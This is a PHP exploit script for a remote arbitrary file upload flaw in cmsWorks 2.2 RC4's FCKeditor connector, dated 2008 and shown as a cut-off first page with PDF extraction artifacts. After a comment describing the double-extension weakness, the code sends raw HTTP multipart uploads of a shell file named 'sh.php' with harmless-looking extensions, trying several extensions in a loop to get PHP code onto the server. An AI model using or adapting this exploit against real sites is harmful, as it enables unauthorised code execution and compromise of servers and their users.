1 <?php
2 /*
3 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
4 cmsWorks 2.2 RC4 (fckeditor) Remote Arbitrary File Upload Exploit
5 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
6 discovered by Stack
7 exploited by ..: EgiX
8 special thnx to EgiX
9 details..: works only with a specific server configuration (e.g. an Apache server with the mod_mime module installed
)
10
11 [−] vulnerable code in path/admin/include/FCKeditor/editor/filemanager/browser/mcpuk/connectors/php/config.php
12
13 121. //File Area
14 122. $fckphp_config[’ResourceAreas’][’File’] =array(
15 123.
16 124. //Files(identified by extension) that may be uploaded to this area
17 125. ’AllowedExtensions’ => array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","
swf","fla"),
18
19 with a default configuration of this script, an attacker might be able to upload arbitrary
20 files containing malicious PHP code due to multiple file extensions isn’t properly checked
21 */
22 error_reporting(0);
23 set_time_limit(0);
24 ini_set("default_socket_timeout", 5);
25 function http_send($host, $packet)
26 {
27 $sock = fsockopen($host, 80);
28 while (!$sock)
29 {
30 print "\n[−] No response from {$host}:80 Trying again...";
31 $sock = fsockopen($host, 80);
32 }
33 fputs($sock, $packet);
34 while (!feof($sock)) $resp .= fread($sock, 1024);
35 fclose($sock);
36 return $resp;
37 }
38 function upload()
39 {
40 global $host, $path;
41
42 $connector = "/admin/include/FCKeditor/editor/filemanager/browser/mcpuk/connectors/php/config.php";
43 $file_ext = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv");
44
45 foreach ($file_ext as $ext)
46 {
47 print "\n[−] Trying to upload with .{$ext} extension...";
48
49 $data = "−−12345\r\n";
50 $data .= "Content−Disposition: form−data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n";
Page 1/3
cmsWorks 2.2 RC4 fckeditor Remote Arbitrary File Upload Exploit
Stack
06/23/2008
51 $data .= "Content−Type: